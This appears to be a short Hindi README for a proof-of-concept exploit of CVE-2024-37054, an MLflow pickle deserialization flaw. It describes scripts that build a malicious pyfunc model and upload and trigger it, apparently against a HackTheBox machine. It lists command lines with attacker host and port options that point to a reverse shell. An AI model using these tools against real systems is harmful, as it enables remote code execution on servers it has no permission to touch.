
CVE-2024-37054 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, MLflow में एक महत्वपूर्ण डिसीरियलाइज़ेशन भेद्यता। अधिकृत पैठ परीक्षण के लिए एक पूर्ण एक्सप्लॉइट स्क्रिप्ट और एक दुर्भावनापूर्ण मॉडल बिल्डर शामिल है।
CVE-2024-37054 के लिए प्रूफ ऑफ कॉन्सेप्ट, जो MLflow संस्करण 0.9.0 से 2.14.1 में एक गंभीर डिसीरियलाइज़ेशन भेद्यता है।
जब mlflow.pyfunc.load_model() के माध्यम से एक दुर्भावनापूर्ण pyfunc मॉडल लोड किया जाता है, तो pickled पेलोड मनमाना कोड निष्पादित करता है।
exploit.py — पूर्ण शोषण: पंजीकरण, प्रशिक्षण, अपलोड, ट्रिगर (HTB SmartHire मशीन के लिए)build_model.py — स्थानीय रूप से दुर्भावनापूर्ण मॉडल बनाएं (केवल बिल्ड)python3 build_model.py --lhost YOUR_IP --lport 4444
# Auto register account and exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz
# Use existing session
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."
केवल शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन परीक्षण के लिए।